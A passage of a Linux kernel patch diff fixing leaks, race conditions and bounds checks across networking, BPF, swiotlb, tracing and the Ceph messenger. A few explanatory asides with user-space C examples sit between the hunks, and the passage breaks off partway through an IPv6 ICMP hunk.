+@@ -135,7 +135,7 @@ extern const struct nla_policy rtm_tca_policy[TCA_MAX + 1];
+  */
+ static inline unsigned int psched_mtu(const struct net_device *dev)
+ {
+-	return dev->mtu + dev->hard_header_len;
++	return READ_ONCE(dev->mtu) + dev->hard_header_len;
+ }
+ 
+ static inline struct net *qdisc_net(struct Qdisc *q)
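
psched_mtu() runs locklessly against concurrent MTU updates, so the hunk above snapshots dev->mtu with READ_ONCE() to rule out torn or repeated loads. A user-space analogue of the same single-load pattern, using C11 atomics in place of the kernel macros:

#include <stdatomic.h>

static _Atomic unsigned int dev_mtu = 1500;

/* Reader: exactly one relaxed load, like READ_ONCE(dev->mtu). */
unsigned int psched_mtu_like(unsigned int hard_header_len)
{
	return atomic_load_explicit(&dev_mtu, memory_order_relaxed)
	       + hard_header_len;
}

/* Writer: publish the new value, the WRITE_ONCE() side of the pair. */
void set_mtu(unsigned int mtu)
{
	atomic_store_explicit(&dev_mtu, mtu, memory_order_relaxed);
}
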
+diff --git a/kernel/bpf/cpumap.c b/kernel/bpf/cpumap.c
+index b5ba34ddd4b64..09141351d5457 100644
+--- a/kernel/bpf/cpumap.c
++++ b/kernel/bpf/cpumap.c
+@@ -127,22 +127,6 @@ static void get_cpu_map_entry(struct bpf_cpu_map_entry *rcpu)
+ 	atomic_inc(&rcpu->refcnt);
+ }
+ 
+-/* called from workqueue, to workaround syscall using preempt_disable */
+-static void cpu_map_kthread_stop(struct work_struct *work)
+-{
+-	struct bpf_cpu_map_entry *rcpu;
+-
+-	rcpu = container_of(work, struct bpf_cpu_map_entry, kthread_stop_wq);
+-
+-	/* Wait for flush in __cpu_map_entry_free(), via full RCU barrier,
+-	 * as it waits until all in-flight call_rcu() callbacks complete.
+-	 */
+-	rcu_barrier();
+-
+-	/* kthread_stop will wake_up_process and wait for it to complete */
+-	kthread_stop(rcpu->kthread);
+-}
+-
+ static void __cpu_map_ring_cleanup(struct ptr_ring *ring)
+ {
+ 	/* The tear-down procedure should have made sure that queue is
+@@ -170,6 +154,30 @@ static void put_cpu_map_entry(struct bpf_cpu_map_entry *rcpu)
+ 	}
+ }
+ 
++/* called from workqueue, to workaround syscall using preempt_disable */
++static void cpu_map_kthread_stop(struct work_struct *work)
++{
++	struct bpf_cpu_map_entry *rcpu;
++	int err;
++
++	rcpu = container_of(work, struct bpf_cpu_map_entry, kthread_stop_wq);
++
++	/* Wait for flush in __cpu_map_entry_free(), via full RCU barrier,
++	 * as it waits until all in-flight call_rcu() callbacks complete.
++	 */
++	rcu_barrier();
++
++	/* kthread_stop will wake_up_process and wait for it to complete */
++	err = kthread_stop(rcpu->kthread);
++	if (err) {
++		/* kthread_stop may be called before cpu_map_kthread_run
++		 * is executed, so we need to release the memory related
++		 * to rcpu.
++		 */
++		put_cpu_map_entry(rcpu);
++	}
++}
++
+ static void cpu_map_bpf_prog_run_skb(struct bpf_cpu_map_entry *rcpu,
+ 				     struct list_head *listp,
+ 				     struct xdp_cpumap_stats *stats)
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 49c6b5e0855cd..8c3ededef3172 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -4357,8 +4357,9 @@ continue_func:
+ 				verbose(env, "verifier bug. subprog has tail_call and async cb\n");
+ 				return -EFAULT;
+ 			}
+-			 /* async callbacks don't increase bpf prog stack size */
+-			continue;
++			/* async callbacks don't increase bpf prog stack size unless called directly */
++			if (!bpf_pseudo_call(insn + i))
++				continue;
+ 		}
+ 		i = next_insn;
+ 
+diff --git a/kernel/dma/swiotlb.c b/kernel/dma/swiotlb.c
+index 7f4ad5e70b40c..ad6333c3fe1ff 100644
+--- a/kernel/dma/swiotlb.c
++++ b/kernel/dma/swiotlb.c
+@@ -117,9 +117,16 @@ static bool round_up_default_nslabs(void)
+ 	return true;
+ }
+ 
++/**
++ * swiotlb_adjust_nareas() - adjust the number of areas and slots
++ * @nareas:	Desired number of areas. Zero is treated as 1.
++ *
++ * Adjust the default number of areas in a memory pool.
++ * The default size of the memory pool may also change to meet minimum area
++ * size requirements.
++ */
+ static void swiotlb_adjust_nareas(unsigned int nareas)
+ {
+-	/* use a single area when non is specified */
+ 	if (!nareas)
+ 		nareas = 1;
+ 	else if (!is_power_of_2(nareas))
+@@ -133,6 +140,23 @@ static void swiotlb_adjust_nareas(unsigned int nareas)
+ 			(default_nslabs << IO_TLB_SHIFT) >> 20);
+ }
+ 
++/**
++ * limit_nareas() - get the maximum number of areas for a given memory pool size
++ * @nareas:	Desired number of areas.
++ * @nslots:	Total number of slots in the memory pool.
++ *
++ * Limit the number of areas to the maximum possible number of areas in
++ * a memory pool of the given size.
++ *
++ * Return: Maximum possible number of areas.
++ */
++static unsigned int limit_nareas(unsigned int nareas, unsigned long nslots)
++{
++	if (nslots < nareas * IO_TLB_SEGSIZE)
++		return nslots / IO_TLB_SEGSIZE;
++	return nareas;
++}
++
+ static int __init
+ setup_io_tlb_npages(char *str)
+ {
+@@ -300,6 +324,38 @@ static void swiotlb_init_io_tlb_mem(struct io_tlb_mem *mem, phys_addr_t start,
+ 	return;
+ }
+ 
++static void __init *swiotlb_memblock_alloc(unsigned long nslabs,
++		unsigned int flags,
++		int (*remap)(void *tlb, unsigned long nslabs))
++{
++	size_t bytes = PAGE_ALIGN(nslabs << IO_TLB_SHIFT);
++	void *tlb;
++
++	/*
++	 * By default allocate the bounce buffer memory from low memory, but
++	 * allow to pick a location everywhere for hypervisors with guest
++	 * memory encryption.
++	 */
++	if (flags & SWIOTLB_ANY)
++		tlb = memblock_alloc(bytes, PAGE_SIZE);
++	else
++		tlb = memblock_alloc_low(bytes, PAGE_SIZE);
++
++	if (!tlb) {
++		pr_warn("%s: Failed to allocate %zu bytes tlb structure\n",
++			__func__, bytes);
++		return NULL;
++	}
++
++	if (remap && remap(tlb, nslabs) < 0) {
++		memblock_free(tlb, PAGE_ALIGN(bytes));
++		pr_warn("%s: Failed to remap %zu bytes\n", __func__, bytes);
++		return NULL;
++	}
++
++	return tlb;
++}
++
+ /*
+  * Statically reserve bounce buffer space and initialize bounce buffer data
+  * structures for the software IO TLB used to implement the DMA API.
+@@ -309,8 +365,8 @@ void __init swiotlb_init_remap(bool addressing_limit, unsigned int flags,
+ {
+ 	struct io_tlb_mem *mem = &io_tlb_default_mem;
+ 	unsigned long nslabs;
++	unsigned int nareas;
+ 	size_t alloc_size;
+-	size_t bytes;
+ 	void *tlb;
+ 
+ 	if (!addressing_limit && !swiotlb_force_bounce)
+@@ -318,39 +374,22 @@ void __init swiotlb_init_remap(bool addressing_limit, unsigned int flags,
+ 	if (swiotlb_force_disable)
+ 		return;
+ 
+-	/*
+-	 * default_nslabs maybe changed when adjust area number.
+-	 * So allocate bounce buffer after adjusting area number.
+-	 */
+ 	if (!default_nareas)
+ 		swiotlb_adjust_nareas(num_possible_cpus());
+ 
+ 	nslabs = default_nslabs;
+-	/*
+-	 * By default allocate the bounce buffer memory from low memory, but
+-	 * allow to pick a location everywhere for hypervisors with guest
+-	 * memory encryption.
+-	 */
+-retry:
+-	bytes = PAGE_ALIGN(nslabs << IO_TLB_SHIFT);
+-	if (flags & SWIOTLB_ANY)
+-		tlb = memblock_alloc(bytes, PAGE_SIZE);
+-	else
+-		tlb = memblock_alloc_low(bytes, PAGE_SIZE);
+-	if (!tlb) {
+-		pr_warn("%s: failed to allocate tlb structure\n", __func__);
+-		return;
+-	}
+-
+-	if (remap && remap(tlb, nslabs) < 0) {
+-		memblock_free(tlb, PAGE_ALIGN(bytes));
+-
++	nareas = limit_nareas(default_nareas, nslabs);
++	while ((tlb = swiotlb_memblock_alloc(nslabs, flags, remap)) == NULL) {
++		if (nslabs <= IO_TLB_MIN_SLABS)
++			return;
+ 		nslabs = ALIGN(nslabs >> 1, IO_TLB_SEGSIZE);
+-		if (nslabs >= IO_TLB_MIN_SLABS)
+-			goto retry;
++		nareas = limit_nareas(nareas, nslabs);
++	}
+ 
+-		pr_warn("%s: Failed to remap %zu bytes\n", __func__, bytes);
+-		return;
++	if (default_nslabs != nslabs) {
++		pr_info("SWIOTLB bounce buffer size adjusted %lu -> %lu slabs\n",
++			default_nslabs, nslabs);
++		default_nslabs = nslabs;
+ 	}
+ 
+ 	alloc_size = PAGE_ALIGN(array_size(sizeof(*mem->slots), nslabs));
+@@ -390,6 +429,7 @@ int swiotlb_init_late(size_t size, gfp_t gfp_mask,
+ {
+ 	struct io_tlb_mem *mem = &io_tlb_default_mem;
+ 	unsigned long nslabs = ALIGN(size >> IO_TLB_SHIFT, IO_TLB_SEGSIZE);
++	unsigned int nareas;
+ 	unsigned char *vstart = NULL;
+ 	unsigned int order, area_order;
+ 	bool retried = false;
+@@ -398,6 +438,9 @@ int swiotlb_init_late(size_t size, gfp_t gfp_mask,
+ 	if (swiotlb_force_disable)
+ 		return 0;
+ 
++	if (!default_nareas)
++		swiotlb_adjust_nareas(num_possible_cpus());
++
+ retry:
+ 	order = get_order(nslabs << IO_TLB_SHIFT);
+ 	nslabs = SLABS_PER_PAGE << order;
+@@ -432,11 +475,8 @@ retry:
+ 			(PAGE_SIZE << order) >> 20);
+ 	}
+ 
+-	if (!default_nareas)
+-		swiotlb_adjust_nareas(num_possible_cpus());
+-
+-	area_order = get_order(array_size(sizeof(*mem->areas),
+-		default_nareas));
++	nareas = limit_nareas(default_nareas, nslabs);
++	area_order = get_order(array_size(sizeof(*mem->areas), nareas));
+ 	mem->areas = (struct io_tlb_area *)
+ 		__get_free_pages(GFP_KERNEL | __GFP_ZERO, area_order);
+ 	if (!mem->areas)
+@@ -450,7 +490,7 @@ retry:
+ 	set_memory_decrypted((unsigned long)vstart,
+ 			     (nslabs << IO_TLB_SHIFT) >> PAGE_SHIFT);
+ 	swiotlb_init_io_tlb_mem(mem, virt_to_phys(vstart), nslabs, 0, true,
+-				default_nareas);
++				nareas);
+ 
+ 	swiotlb_print_info();
+ 	return 0;
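
A worked example of the limit_nareas() clamp used above, assuming IO_TLB_SEGSIZE is 128 (its current kernel value): every area needs at least one 128-slot segment, so the area count is capped at nslots / 128.

#define IO_TLB_SEGSIZE	128	/* assumed value */

static unsigned int limit_nareas(unsigned int nareas, unsigned long nslots)
{
	if (nslots < nareas * IO_TLB_SEGSIZE)
		return nslots / IO_TLB_SEGSIZE;
	return nareas;
}

/*
 * limit_nareas(256, 32768) == 256   (32768 slots hold 256 areas exactly)
 * limit_nareas(256,  8192) ==  64   (after the retry loop halves nslabs)
 */
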
+diff --git a/kernel/power/qos.c b/kernel/power/qos.c
+index af51ed6d45ef1..782d3b41c1f35 100644
+--- a/kernel/power/qos.c
++++ b/kernel/power/qos.c
+@@ -426,6 +426,11 @@ late_initcall(cpu_latency_qos_init);
+ 
+ /* Definitions related to the frequency QoS below. */
+ 
++static inline bool freq_qos_value_invalid(s32 value)
++{
++	return value < 0 && value != PM_QOS_DEFAULT_VALUE;
++}
++
+ /**
+  * freq_constraints_init - Initialize frequency QoS constraints.
+  * @qos: Frequency QoS constraints to initialize.
+@@ -531,7 +536,7 @@ int freq_qos_add_request(struct freq_constraints *qos,
+ {
+ 	int ret;
+ 
+-	if (IS_ERR_OR_NULL(qos) || !req || value < 0)
++	if (IS_ERR_OR_NULL(qos) || !req || freq_qos_value_invalid(value))
+ 		return -EINVAL;
+ 
+ 	if (WARN(freq_qos_request_active(req),
+@@ -563,7 +568,7 @@ EXPORT_SYMBOL_GPL(freq_qos_add_request);
+  */
+ int freq_qos_update_request(struct freq_qos_request *req, s32 new_value)
+ {
+-	if (!req || new_value < 0)
++	if (!req || freq_qos_value_invalid(new_value))
+ 		return -EINVAL;
+ 
+ 	if (WARN(!freq_qos_request_active(req),
+diff --git a/kernel/trace/fprobe.c b/kernel/trace/fprobe.c
+index e8143e3680744..1322247ce6488 100644
+--- a/kernel/trace/fprobe.c
++++ b/kernel/trace/fprobe.c
+@@ -307,19 +307,16 @@ int unregister_fprobe(struct fprobe *fp)
+ 		    fp->ops.saved_func != fprobe_kprobe_handler))
+ 		return -EINVAL;
+ 
+-	/*
+-	 * rethook_free() starts disabling the rethook, but the rethook handlers
+-	 * may be running on other processors at this point. To make sure that all
+-	 * current running handlers are finished, call unregister_ftrace_function()
+-	 * after this.
+-	 */
+ 	if (fp->rethook)
+-		rethook_free(fp->rethook);
++		rethook_stop(fp->rethook);
+ 
+ 	ret = unregister_ftrace_function(&fp->ops);
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (fp->rethook)
++		rethook_free(fp->rethook);
++
+ 	ftrace_free_filter(&fp->ops);
+ 
+ 	return ret;
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index 57db50c2dce80..552956ccb91c8 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -3213,6 +3213,22 @@ static int ftrace_allocate_records(struct ftrace_page *pg, int count)
+ 	return cnt;
+ }
+ 
++static void ftrace_free_pages(struct ftrace_page *pages)
++{
++	struct ftrace_page *pg = pages;
++
++	while (pg) {
++		if (pg->records) {
++			free_pages((unsigned long)pg->records, pg->order);
++			ftrace_number_of_pages -= 1 << pg->order;
++		}
++		pages = pg->next;
++		kfree(pg);
++		pg = pages;
++		ftrace_number_of_groups--;
++	}
++}
++
+ static struct ftrace_page *
+ ftrace_allocate_pages(unsigned long num_to_init)
+ {
+@@ -3251,17 +3267,7 @@ ftrace_allocate_pages(unsigned long num_to_init)
+ 	return start_pg;
+ 
+  free_pages:
+-	pg = start_pg;
+-	while (pg) {
+-		if (pg->records) {
+-			free_pages((unsigned long)pg->records, pg->order);
+-			ftrace_number_of_pages -= 1 << pg->order;
+-		}
+-		start_pg = pg->next;
+-		kfree(pg);
+-		pg = start_pg;
+-		ftrace_number_of_groups--;
+-	}
++	ftrace_free_pages(start_pg);
+ 	pr_info("ftrace: FAILED to allocate memory for functions\n");
+ 	return NULL;
+ }
+@@ -6666,9 +6672,11 @@ static int ftrace_process_locs(struct module *mod,
+ 			       unsigned long *start,
+ 			       unsigned long *end)
+ {
++	struct ftrace_page *pg_unuse = NULL;
+ 	struct ftrace_page *start_pg;
+ 	struct ftrace_page *pg;
+ 	struct dyn_ftrace *rec;
++	unsigned long skipped = 0;
+ 	unsigned long count;
+ 	unsigned long *p;
+ 	unsigned long addr;
+@@ -6731,8 +6739,10 @@ static int ftrace_process_locs(struct module *mod,
+ 		 * object files to satisfy alignments.
+ 		 * Skip any NULL pointers.
+ 		 */
+-		if (!addr)
++		if (!addr) {
++			skipped++;
+ 			continue;
++		}
+ 
+ 		end_offset = (pg->index+1) * sizeof(pg->records[0]);
+ 		if (end_offset > PAGE_SIZE << pg->order) {
+@@ -6746,8 +6756,10 @@ static int ftrace_process_locs(struct module *mod,
+ 		rec->ip = addr;
+ 	}
+ 
+-	/* We should have used all pages */
+-	WARN_ON(pg->next);
++	if (pg->next) {
++		pg_unuse = pg->next;
++		pg->next = NULL;
++	}
+ 
+ 	/* Assign the last page to ftrace_pages */
+ 	ftrace_pages = pg;
+@@ -6769,6 +6781,11 @@ static int ftrace_process_locs(struct module *mod,
+  out:
+ 	mutex_unlock(&ftrace_lock);
+ 
++	/* We should have used all pages unless we skipped some */
++	if (pg_unuse) {
++		WARN_ON(!skipped);
++		ftrace_free_pages(pg_unuse);
++	}
+ 	return ret;
+ }
+ 
+diff --git a/kernel/trace/rethook.c b/kernel/trace/rethook.c
+index 60f6cb2b486bf..468006cce7cae 100644
+--- a/kernel/trace/rethook.c
++++ b/kernel/trace/rethook.c
+@@ -53,6 +53,19 @@ static void rethook_free_rcu(struct rcu_head *head)
+ 		kfree(rh);
+ }
+ 
++/**
++ * rethook_stop() - Stop using a rethook.
++ * @rh: the struct rethook to stop.
++ *
++ * Stop using a rethook to prepare for freeing it. If you want to wait for
++ * all running rethook handlers before calling rethook_free(), call this
++ * first, wait for an RCU grace period, and then call rethook_free().
++ */
++void rethook_stop(struct rethook *rh)
++{
++	WRITE_ONCE(rh->handler, NULL);
++}
++
+ /**
+  * rethook_free() - Free struct rethook.
+  * @rh: the struct rethook to be freed.
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 4acc27cb856f8..c264421c4ecd8 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -5238,28 +5238,34 @@ unsigned long ring_buffer_size(struct trace_buffer *buffer, int cpu)
+ }
+ EXPORT_SYMBOL_GPL(ring_buffer_size);
+ 
++static void rb_clear_buffer_page(struct buffer_page *page)
++{
++	local_set(&page->write, 0);
++	local_set(&page->entries, 0);
++	rb_init_page(page->page);
++	page->read = 0;
++}
++
+ static void
+ rb_reset_cpu(struct ring_buffer_per_cpu *cpu_buffer)
+ {
++	struct buffer_page *page;
++
+ 	rb_head_page_deactivate(cpu_buffer);
+ 
+ 	cpu_buffer->head_page
+ 		= list_entry(cpu_buffer->pages, struct buffer_page, list);
+-	local_set(&cpu_buffer->head_page->write, 0);
+-	local_set(&cpu_buffer->head_page->entries, 0);
+-	local_set(&cpu_buffer->head_page->page->commit, 0);
+-
+-	cpu_buffer->head_page->read = 0;
++	rb_clear_buffer_page(cpu_buffer->head_page);
++	list_for_each_entry(page, cpu_buffer->pages, list) {
++		rb_clear_buffer_page(page);
++	}
+ 
+ 	cpu_buffer->tail_page = cpu_buffer->head_page;
+ 	cpu_buffer->commit_page = cpu_buffer->head_page;
+ 
+ 	INIT_LIST_HEAD(&cpu_buffer->reader_page->list);
+ 	INIT_LIST_HEAD(&cpu_buffer->new_pages);
+-	local_set(&cpu_buffer->reader_page->write, 0);
+-	local_set(&cpu_buffer->reader_page->entries, 0);
+-	local_set(&cpu_buffer->reader_page->page->commit, 0);
+-	cpu_buffer->reader_page->read = 0;
++	rb_clear_buffer_page(cpu_buffer->reader_page);
+ 
+ 	local_set(&cpu_buffer->entries_bytes, 0);
+ 	local_set(&cpu_buffer->overrun, 0);
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 5c1087df2f1c4..27bbe180a2ef2 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -6679,6 +6679,7 @@ static int tracing_release_pipe(struct inode *inode, struct file *file)
+ 
+ 	free_cpumask_var(iter->started);
+ 	kfree(iter->fmt);
++	kfree(iter->temp);
+ 	mutex_destroy(&iter->mutex);
+ 	kfree(iter);
+ 
+@@ -8061,7 +8062,7 @@ static const struct file_operations tracing_err_log_fops = {
+ 	.open           = tracing_err_log_open,
+ 	.write		= tracing_err_log_write,
+ 	.read           = seq_read,
+-	.llseek         = seq_lseek,
++	.llseek         = tracing_lseek,
+ 	.release        = tracing_err_log_release,
+ };
+ 
+diff --git a/kernel/trace/trace_eprobe.c b/kernel/trace/trace_eprobe.c
+index 753fc536525d3..d2370cdb4c1d6 100644
+--- a/kernel/trace/trace_eprobe.c
++++ b/kernel/trace/trace_eprobe.c
+@@ -743,6 +743,7 @@ static int enable_trace_eprobe(struct trace_event_call *call,
+ 	struct trace_eprobe *ep;
+ 	bool enabled;
+ 	int ret = 0;
++	int cnt = 0;
+ 
+ 	tp = trace_probe_primary_from_call(call);
+ 	if (WARN_ON_ONCE(!tp))
+@@ -766,12 +767,25 @@ static int enable_trace_eprobe(struct trace_event_call *call,
+ 		if (ret)
+ 			break;
+ 		enabled = true;
++		cnt++;
+ 	}
+ 
+ 	if (ret) {
+ 		/* Failed to enable one of them. Roll back all */
+-		if (enabled)
+-			disable_eprobe(ep, file->tr);
++		if (enabled) {
++			/*
++			 * It's a bug if one failed for something other than memory
++			 * not being available but another eprobe succeeded.
++			 */
++			WARN_ON_ONCE(ret != -ENOMEM);
++
++			list_for_each_entry(pos, trace_probe_probe_list(tp), list) {
++				ep = container_of(pos, struct trace_eprobe, tp);
++				disable_eprobe(ep, file->tr);
++				if (!--cnt)
++					break;
++			}
++		}
+ 		if (file)
+ 			trace_probe_remove_file(tp, file);
+ 		else
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 75244d9e2bf9a..105253b9bc31d 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -6555,13 +6555,15 @@ static int event_hist_trigger_parse(struct event_command *cmd_ops,
+ 	if (get_named_trigger_data(trigger_data))
+ 		goto enable;
+ 
+-	if (has_hist_vars(hist_data))
+-		save_hist_vars(hist_data);
+-
+ 	ret = create_actions(hist_data);
+ 	if (ret)
+ 		goto out_unreg;
+ 
++	if (has_hist_vars(hist_data) || hist_data->n_var_refs) {
++		if (save_hist_vars(hist_data))
++			goto out_unreg;
++	}
++
+ 	ret = tracing_map_init(hist_data->map);
+ 	if (ret)
+ 		goto out_unreg;
+diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
+index 625cab4b9d945..bff699fe9e712 100644
+--- a/kernel/trace/trace_events_user.c
++++ b/kernel/trace/trace_events_user.c
+@@ -707,6 +707,9 @@ static int user_field_set_string(struct ftrace_event_field *field,
+ 	pos += snprintf(buf + pos, LEN_OR_ZERO, " ");
+ 	pos += snprintf(buf + pos, LEN_OR_ZERO, "%s", field->name);
+ 
++	if (str_has_prefix(field->type, "struct "))
++		pos += snprintf(buf + pos, LEN_OR_ZERO, " %d", field->size);
++
+ 	if (colon)
+ 		pos += snprintf(buf + pos, LEN_OR_ZERO, ";");
+ 
+@@ -1456,7 +1459,8 @@ static ssize_t user_events_write_core(struct file *file, struct iov_iter *i)
+ 
+ 		if (unlikely(faulted))
+ 			return -EFAULT;
+-	}
++	} else
++		return -EBADF;
+ 
+ 	return ret;
+ }
+diff --git a/kernel/trace/trace_probe_tmpl.h b/kernel/trace/trace_probe_tmpl.h
+index b3bdb8ddb8622..c293a607d5366 100644
+--- a/kernel/trace/trace_probe_tmpl.h
++++ b/kernel/trace/trace_probe_tmpl.h
+@@ -143,6 +143,8 @@ stage3:
+ array:
+ 	/* the last stage: Loop on array */
+ 	if (code->op == FETCH_OP_LP_ARRAY) {
++		if (ret < 0)
++			ret = 0;
+ 		total += ret;
+ 		if (++i < code->param) {
+ 			code = s3;
+@@ -204,11 +206,13 @@ store_trace_args(void *data, struct trace_probe *tp, void *rec,
+ 		if (unlikely(arg->dynamic))
+ 			*dl = make_data_loc(maxlen, dyndata - base);
+ 		ret = process_fetch_insn(arg->code, rec, dl, base);
+-		if (unlikely(ret < 0 && arg->dynamic)) {
+-			*dl = make_data_loc(0, dyndata - base);
+-		} else {
+-			dyndata += ret;
+-			maxlen -= ret;
++		if (arg->dynamic) {
++			if (unlikely(ret < 0)) {
++				*dl = make_data_loc(0, dyndata - base);
++			} else {
++				dyndata += ret;
++				maxlen -= ret;
++			}
+ 		}
+ 	}
+ }
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index 4dd494f786bcd..1e1557e42d2cc 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -698,12 +698,17 @@ static void clear_work_data(struct work_struct *work)
+ 	set_work_data(work, WORK_STRUCT_NO_POOL, 0);
+ }
+ 
++static inline struct pool_workqueue *work_struct_pwq(unsigned long data)
++{
++	return (struct pool_workqueue *)(data & WORK_STRUCT_WQ_DATA_MASK);
++}
++
+ static struct pool_workqueue *get_work_pwq(struct work_struct *work)
+ {
+ 	unsigned long data = atomic_long_read(&work->data);
+ 
+ 	if (data & WORK_STRUCT_PWQ)
+-		return (void *)(data & WORK_STRUCT_WQ_DATA_MASK);
++		return work_struct_pwq(data);
+ 	else
+ 		return NULL;
+ }
+@@ -731,8 +736,7 @@ static struct worker_pool *get_work_pool(struct work_struct *work)
+ 	assert_rcu_or_pool_mutex();
+ 
+ 	if (data & WORK_STRUCT_PWQ)
+-		return ((struct pool_workqueue *)
+-			(data & WORK_STRUCT_WQ_DATA_MASK))->pool;
++		return work_struct_pwq(data)->pool;
+ 
+ 	pool_id = data >> WORK_OFFQ_POOL_SHIFT;
+ 	if (pool_id == WORK_OFFQ_POOL_NONE)
+@@ -753,8 +757,7 @@ static int get_work_pool_id(struct work_struct *work)
+ 	unsigned long data = atomic_long_read(&work->data);
+ 
+ 	if (data & WORK_STRUCT_PWQ)
+-		return ((struct pool_workqueue *)
+-			(data & WORK_STRUCT_WQ_DATA_MASK))->pool->id;
++		return work_struct_pwq(data)->pool->id;
+ 
+ 	return data >> WORK_OFFQ_POOL_SHIFT;
+ }
+diff --git a/mm/kasan/kasan.h b/mm/kasan/kasan.h
+index abbcc1b0eec50..a898f05a2afd6 100644
+--- a/mm/kasan/kasan.h
++++ b/mm/kasan/kasan.h
+@@ -629,4 +629,7 @@ void __hwasan_storeN_noabort(unsigned long addr, size_t size);
+ 
+ void __hwasan_tag_memory(unsigned long addr, u8 tag, unsigned long size);
+ 
++void kasan_tag_mismatch(unsigned long addr, unsigned long access_info,
++			unsigned long ret_ip);
++
+ #endif /* __MM_KASAN_KASAN_H */
+diff --git a/net/ceph/messenger_v2.c b/net/ceph/messenger_v2.c
+index 3009028c4fa28..489baf2e6176c 100644
+--- a/net/ceph/messenger_v2.c
++++ b/net/ceph/messenger_v2.c
+@@ -392,6 +392,8 @@ static int head_onwire_len(int ctrl_len, bool secure)
+ 	int head_len;
+ 	int rem_len;
+ 
++	BUG_ON(ctrl_len < 0 || ctrl_len > CEPH_MSG_MAX_CONTROL_LEN);
++
+ 	if (secure) {
+ 		head_len = CEPH_PREAMBLE_SECURE_LEN;
+ 		if (ctrl_len > CEPH_PREAMBLE_INLINE_LEN) {
+@@ -410,6 +412,10 @@ static int head_onwire_len(int ctrl_len, bool secure)
+ static int __tail_onwire_len(int front_len, int middle_len, int data_len,
+ 			     bool secure)
+ {
++	BUG_ON(front_len < 0 || front_len > CEPH_MSG_MAX_FRONT_LEN ||
++	       middle_len < 0 || middle_len > CEPH_MSG_MAX_MIDDLE_LEN ||
++	       data_len < 0 || data_len > CEPH_MSG_MAX_DATA_LEN);
++
+ 	if (!front_len && !middle_len && !data_len)
+ 		return 0;
+ 
+@@ -522,29 +528,34 @@ static int decode_preamble(void *p, struct ceph_frame_desc *desc)
+ 		desc->fd_aligns[i] = ceph_decode_16(&p);
+ 	}
+ 
+-	/*
+-	 * This would fire for FRAME_TAG_WAIT (it has one empty
+-	 * segment), but we should never get it as client.
+-	 */
+-	if (!desc->fd_lens[desc->fd_seg_cnt - 1]) {
+-		pr_err("last segment empty\n");
++	if (desc->fd_lens[0] < 0 ||
++	    desc->fd_lens[0] > CEPH_MSG_MAX_CONTROL_LEN) {
++		pr_err("bad control segment length %d\n", desc->fd_lens[0]);
+ 		return -EINVAL;
+ 	}
+-
+-	if (desc->fd_lens[0] > CEPH_MSG_MAX_CONTROL_LEN) {
+-		pr_err("control segment too big %d\n", desc->fd_lens[0]);
++	if (desc->fd_lens[1] < 0 ||
++	    desc->fd_lens[1] > CEPH_MSG_MAX_FRONT_LEN) {
++		pr_err("bad front segment length %d\n", desc->fd_lens[1]);
+ 		return -EINVAL;
+ 	}
+-	if (desc->fd_lens[1] > CEPH_MSG_MAX_FRONT_LEN) {
+-		pr_err("front segment too big %d\n", desc->fd_lens[1]);
++	if (desc->fd_lens[2] < 0 ||
++	    desc->fd_lens[2] > CEPH_MSG_MAX_MIDDLE_LEN) {
++		pr_err("bad middle segment length %d\n", desc->fd_lens[2]);
+ 		return -EINVAL;
+ 	}
+-	if (desc->fd_lens[2] > CEPH_MSG_MAX_MIDDLE_LEN) {
+-		pr_err("middle segment too big %d\n", desc->fd_lens[2]);
++	if (desc->fd_lens[3] < 0 ||
++	    desc->fd_lens[3] > CEPH_MSG_MAX_DATA_LEN) {
++		pr_err("bad data segment length %d\n", desc->fd_lens[3]);
+ 		return -EINVAL;
+ 	}
+-	if (desc->fd_lens[3] > CEPH_MSG_MAX_DATA_LEN) {
+-		pr_err("data segment too big %d\n", desc->fd_lens[3]);
++
++	/*
++	 * This would fire for FRAME_TAG_WAIT (it has one empty
++	 * segment), but we should never get it as client.
++	 */
++	if (!desc->fd_lens[desc->fd_seg_cnt - 1]) {
++		pr_err("last segment empty, segment count %d\n",
++		       desc->fd_seg_cnt);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index ef9772b12624c..b6c16db86c719 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -4042,6 +4042,11 @@ struct sk_buff *skb_segment_list(struct sk_buff *skb,
+ 
+ 	skb_push(skb, -skb_network_offset(skb) + offset);
+ 
++	/* Ensure the head is writeable before touching the shared info */
++	err = skb_unclone(skb, GFP_ATOMIC);
++	if (err)
++		goto err_linearize;
++
+ 	skb_shinfo(skb)->frag_list = NULL;
+ 
+ 	while (list_skb) {
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index e6c7edcf68343..51bfc74805ecf 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -318,9 +318,8 @@ static void addrconf_del_dad_work(struct inet6_ifaddr *ifp)
+ static void addrconf_mod_rs_timer(struct inet6_dev *idev,
+ 				  unsigned long when)
+ {
+-	if (!timer_pending(&idev->rs_timer))
++	if (!mod_timer(&idev->rs_timer, jiffies + when))
+ 		in6_dev_hold(idev);
+-	mod_timer(&idev->rs_timer, jiffies + when);
+ }
+ 
+ static void addrconf_mod_dad_work(struct inet6_ifaddr *ifp,
+diff --git a/net/ipv6/icmp.c b/net/ipv6/icmp.c
+index 9d92d51c47577..e2af7ab992821 100644
+--- a/net/ipv6/icmp.c
++++ b/net/ipv6/icmp.c
+@@ -422,7 +422,10 @@ static struct net_device *icmp6_dev(const struct sk_buff *skb)
